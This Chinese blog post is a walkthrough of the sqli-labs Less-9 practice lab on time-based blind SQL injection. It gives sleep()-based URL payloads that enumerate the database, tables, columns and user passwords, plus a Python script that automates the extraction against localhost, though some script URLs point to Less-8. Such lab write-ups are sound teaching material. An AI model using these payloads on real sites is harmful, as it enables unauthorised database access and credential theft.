SQL注入——sqli-labs-Less-9时间盲注

已于 2023-04-09 20:51:53 修改
阅读量686 收藏 4
点赞数
文章标签: 安全
于 2023-04-06 18:02:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63563528/article/details/129994234
版权

这篇学习是参考未完成的歌~师傅的:

SQL注入学习——时间盲注详解 sqli-labs(Less 9)http://t.csdn.cn/6YyaU

文末有盲注脚本

一.做题之前

1.什么是时间盲注?

时间盲注,通过时间函数使SQL语句执行时间延长,从页面响应时间判断条件是否正确的一种注入方式。

2.时间盲注常用函数

if(expr1,expr2,expr3):判断语句,如果第一个语句正确就执行第二个语句,如果错误执行第三个语句
sleep(n)      将程序挂起一段时间 n单位为秒
left(a,b)     从左侧截取a的前b位
substr(a,b,c) 从b位置开始,截取字符串a的c长度
mid(a,b,c)    从位置b开始,截取a字符串的c位
length()      返回字符串的长度
Ascii()       将某个字符转换为ascii值
char()        将ASCII码转换为对应的字符

二.看题

这一关是时间盲注、单引号盲注:

时间盲注,不同于布尔盲注的地方在于,不会进行对错的回显,对所有信息都作统一输出,也就是说我们在盲注时,将更加难以进行判断。

刚刚提到的函数中,sleep函数将帮助到我们,我们根据浏览器是否延时输出了来判断对错:

举例:

if(查询语句,sleep(5),1)

如果查询的语句为假,那么直接输出;如果查询的语句为真,那么过5秒之后输出。

回到题目上来,做这道题时总共分了6步,依次来看:

1.判断数据库的库名长度

?id=1' and if(length(database())=8,sleep(5),1)--+

从1开始穷举,到=8的时候延迟5秒输出,所以库名长度为8。

2.判断数据库名

测试库名的第一位:

?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+

测得第一位为ASCII编码的115,是字母“s”

测试第二位:

?id=1'and if(ascii(substr(database(),2,1))=101,sleep(5),1)--+

测得第二位是ASCII码101,是字母“e”

依次穷举类推,判断出来数据库名为security,库名长度8位。

接下来第三步是推测数据表,首先是数据表名长度:

3.表名长度

下面这个payload中,x代表是第几个表,y代表表名长度是多少:

?id=1' and if(length(select table_name from information_schema.tables where table_schema = database() limit x,1)<y,sleep(5),1)--+

下面是security数据库中的第一个表的表名长度:

?id=1' and if(length((select table_name from information_schema.tables where table_schema = 'security' limit 0,1))=6,sleep(5),1)--+

4.推测表名

?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),1)--+

测得第一个表名的第一位是“e”,递推下去得到表名:emails

?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=114,sleep(5),1)--+

然后,第二个表名的第一位是“r”,依此类推得到第二个表名“referers”,第三个“uagens”,第四个“users”

下面尝试注users表

5.猜测users表的列

?id=1' and if(ascii(substr((select column_name from information _schema.columns where table_name='users' limit 0,1),1,1))=105,sleep(5),1)--+

测得第一列的名称的第一个字符是“i”,同样类推,得到第一列名为“id”,第二列“username”第三列“password”

6.猜测username、password的所有内容

?id=1' and if(ascii(substr((select username from users limit 0,1), 1,1))=68,sleep(5),1)--+

手注是可以注出来,但是相当费时间,我认为,手注更大的意义在于理解方法。所以这里搬运了老师傅的时间盲注脚本我们共同学习:

注意:共有6处url需要改成你自己的url

import requests


# 获取数据库名长度
def database_len():
    for i in range(1, 10):
        url = f"http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(length(database())>{i},1,sleep(2))"
        r = requests.get(url + '%23')
        if r.elapsed.total_seconds()>2:
            print('database_length:', i)
            return i


#获取数据库名
def database_name(databaselen):
     name = ''
     for j in range(1, databaselen+1):
        for i in "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz":
            url = "http://127.0.0.1/sqli-labs/Less-8/?id=1' " \
                  "and if(substr(database(),%d,1)='%s',sleep(2),1)" % (j, i)
            #print(url+'%23')
            r = requests.get(url + '%23')
            if r.elapsed.total_seconds()>2:
                name = name + i
                break
     print('database_name:', name)


# 获取数据库表
def tables_name():
    name = ''
    for j in range(1, 30):
        for i in 'abcdefghijklmnopqrstuvwxyz,':
            url = "http://127.0.0.1/sqli-labs/Less-8/?id=1' " \
                  "and if(substr((select group_concat(table_name) from information_schema.tables " \
                  "where table_schema=database()),%d,1)='%s',sleep(2),1)" % (j, i)
            r = requests.get(url + '%23')
            if r.elapsed.total_seconds()>2:
                name = name + i
                break
    print('table_name:', name)



# 获取表中字段
def columns_name():
    name = ''
    for j in range(1, 30):
        for i in 'abcdefghijklmnopqrstuvwxyz,':
            url = "http://127.0.0.1/sqli-labs/Less-8/?id=1' " \
                  "and if(substr((select group_concat(column_name) from information_schema.columns where " \
                  "table_schema=database() and table_name='users'),%d,1)='%s',sleep(2),1)" % (j, i)
            r = requests.get(url + '%23')
            if r.elapsed.total_seconds()>2:
                name = name + i
                break
    print('column_name:', name)



# 获取username
def username_value():
    name = ''
    for j in range(1, 100):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            url = "http://127.0.0.1/sqli-labs/Less-8/?id=1' " \
                  "and if(substr((select group_concat(username) from users),%d,1)='%s',sleep(2),1)" % (j, i)
            r = requests.get(url + '%23')
            if r.elapsed.total_seconds()>2:
                name = name + i
                break
    print('username_value:', name)



# 获取password
def password_value():
    name = ''
    for j in range(1, 100):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            url = "http://127.0.0.1/sqli-labs/Less-8/?id=1' " \
                  "and if(substr((select group_concat(password) from users),%d,1)='%s',sleep(2),1)" % (j, i)
            r = requests.get(url + '%23')
            if r.elapsed.total_seconds()>2:
                name = name + i
                break
    print('password_value:', name)


if __name__ == '__main__':
    dblen = database_len()
    database_name(dblen)
    tables_name()
    columns_name()
    username_value()
    password_value()

等待脚本跑完,成功得到信息:

7ig3r
关注
SQL注入天书SQLi-LABS(Less1-7)
网络猿的博客
01-15 1332
SQL注入天书SQLi-LABS(Less1-7) 往期回顾: SQLi-LABS搭建教程:SQL注入天书(SQLi-LABS)搭建 文章目录SQL注入天书SQLi-LABS(Less1-7)一、SQL注入天书SQLi-LABS(一)Less-1(二)Less-2(三)Less-3(三)Less-4(三)Less-5(三)Less-6(三)Less-7 一、SQL注入天书SQLi-LABS (一)Less-1 1、http://127.0.0.1/sqli-labs/Less-1/?id=1’ o
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1751
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
SQLi LABS Less 9 时间盲注
热门推荐
wangyuxiang946的博客
06-22 1万+
SQLi 第九关,SQLi-LABS Less-9,SQLi-LABS Less 9,SQLiLABS Less9,SQLi Less 9
SQL注入——sqli-labs-Less-9时间盲注_sqliless9
最新发布
2401_87034325的博客
09-12 483
测得第二位是ASCII码101,是字母“e”依次穷举类推,判断出来数据库名为security,库名长度8位。
sqli-labs(less-9)
不知名白帽的博客
07-14 1029
sqli-labs(less-9)。less-9(时间盲注)
SQL注入——基于时间盲注sqli-labs less9)
yuan114012的博客
05-21 1021
一.基于时间盲注 适用场景:没有数据回显,条件正确与否结果一样 利用方式:构造判断条件,添加sleep,逐个猜测(盲猜) 1.所需语法与函数 IF表达式 IF( expr1 , expr2 , expr3 ) #expr1 的值为 TRUE,则返回值为 expr2 #expr1 的值为FALSE,则返回值为 expr3 expr1 的值为 TRUE,则返回值为 expr2 expr1 的值为FALSE,则返回值为 expr3 mysql> select if(1=1,1,.
sqli-labs-less9
m0_68980215的博客
07-08 219
sql lesson9
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1543
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sql注入sqli-labs系列教程(less1-10)详解
wangqaz50的博客
02-03 386
<div id="article_content" class="article_content clearfix"> <link rel="stylesheet" href="https://csdnimg.cn/release/blogv2/dist/mdeditor/css/editerView/ck_htmledit_views-b5506197d8.css"> <div id="content_views" class="mar...
sql注入;基于时间盲注sqli-labs/less-9;
xiaochenhang的博客
08-18 324
1、搭建好环境,连好数据库;这里看我这篇文章,可以找到网盘文件。利用burpsuite抓包,将数据长度设置为变量,进行匹配;由于大小写不敏感,所以通过ascll码转换后和数字比对得出。2、无真假,报错回显,通过时间延迟判断;6、这次只匹配小写数据库,既然大小写不敏感。if(判断函数,为真返回值,为假返回值)第二个参数为ascll中的0-127。limit0,1-->找第一张表;3、通过延迟函数判断是否有延迟。8、爆一下emails表的字段名。这里延迟6秒:成功,有时间盲注。9、爆一下字段id的数据。...
sqli-labs Less-9 时间盲注
m0_63711447的博客
04-12 1079
使用的函数补充: if(condition,A,B)如果条件condition为true,则执行语句A,否则执行语句B eg.select if(1>2,3,4); 返回的结果为4(若是在MySQL命令行中使用,应先use xxx数据库) 可组合使用,当前数据库为security ...
sqli-labs:less-9(时间盲注
羽的博客
07-21 483
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset...
Sqli-labs less 9
weixin_34049032的博客
08-11 190
Less-9 本关我们从标题就可以看到 《基于时间-单引号》,所以很明显的这关要我们利用延时注入进行,同时id参数进行的是 ' 的处理。这里我们大致的将延时注入的方法演示一次。 这里用sleep()函数。 这里因为我们利用的是时间的延迟,贴图就没有意义了,这里只写payload了:(正确的时候直接返回,不正确的时候等待5秒钟,只贴正确的) 猜测数据库: http://127.0.0.1/...
【针对sqli-labs第9关的时间盲注python脚本】
AA8j的博客
09-09 774
效果图 源码 #!/usr/bin/python # -*- coding: utf-8 -*- # @Time : 2021/9/7 10:20 # @Author : AA8j # @Site : # @File : Time-based-blind-SQL-injection.py # @Software: PyCharm # @Blog : https://blog.csdn.net/qq_44874645 import binascii import request
sqli-labs/Less-9
m0_71299382的博客
11-09 288
sqli-labs第九关
sqlilabs less9
TA不懒,但还没有添加简介
06-27 225
sqlilabs less9
sqli-labs (less-9)
kukudeshuo的博客
03-08 1480
sqli-labs (less-9) 补充知识 本关将介绍与Boolean盲注非常相似的另一种注入方法——时间盲注。他与Boolean盲注的不同之处在于,时间注入是利用sleep()或benchmark()等函数让MySQL的执行时间变长。时间盲注多与IF(expr1,expr2,expr3)结合使用,此if语句含义是:如果expr1是TRUE,则IF()的返回值为expr2;否则返回值则为expr3。 例: if (length(database())>1,1,sleep(5)),这句语句的意思是查
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值